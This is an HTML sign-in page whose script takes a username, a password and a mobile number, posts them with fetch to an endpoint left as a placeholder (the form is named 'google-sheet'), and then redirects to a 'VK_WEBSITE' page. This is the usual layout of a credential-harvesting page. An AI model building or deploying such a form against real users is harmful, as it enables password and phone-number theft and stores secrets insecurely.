<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign In</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      text-align: center;
      margin: 0;
      padding: 0;
      background: url('https://cdn.dribbble.com/users/1453459/screenshots/4312772/media/ce6e6ea1db77ca363aec1c192749b214.gif') center center fixed;
      background-size: cover;
    }
    .container {
      width: 300px;
      background-color: rgba(255, 255, 255, 0.497);
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      margin: 0 auto;
    }
    label {
      display: block;
      margin-bottom: 8px;
    }
    input {
      width: 100%;
      padding: 8px;
      margin-bottom: 16px;
      box-sizing: border-box;
    }
    .button {
      display: center;
      width: 20%;
      padding: 6px 9px;
      background-color: #007bff;
      color: #fff;
      border: none;
      border-radius: 5px;
      text-decoration: none;
      cursor: pointer;
    }

    .button:hover {
      background-color: #04d900;
    }

    .button:active {
      background-color: #00b303;
    }
    .content{
      text-align: center;
      padding: 20px;
      color: rgb(55, 0, 255);
    }
    #boxsingin {
      margin-top: 20%;
    }
  </style>
  </style>
</head>
<body>
  <div id="boxsingin">
  <div class="container">
    <h2>Sign In</h2>
    <form action="#" method="post" name="google-sheet">
      <label for="Username">Username</label>
      <input type="text" id="Username" name="Username" required>

      <label for="Password">Password</label>
      <input type="password" id="Password" name="Password" required>

      <label for="mobilenumber">mobile number</label>
      <input type="tel" id="mobilenumber" name="mobilenumber" required>

      <button type="submit" class="button">Sign In</button>
    </form>
  </div>
  </div>
    <script>
        const scriptURL = '#'
        const form = document.forms['google-sheet']
        form.addEventListener('submit', e => {
        e.preventDefault()
        fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        window.location.href = 'VK_WEBSITE\index.html'
    })
  </script>
</body>
</html>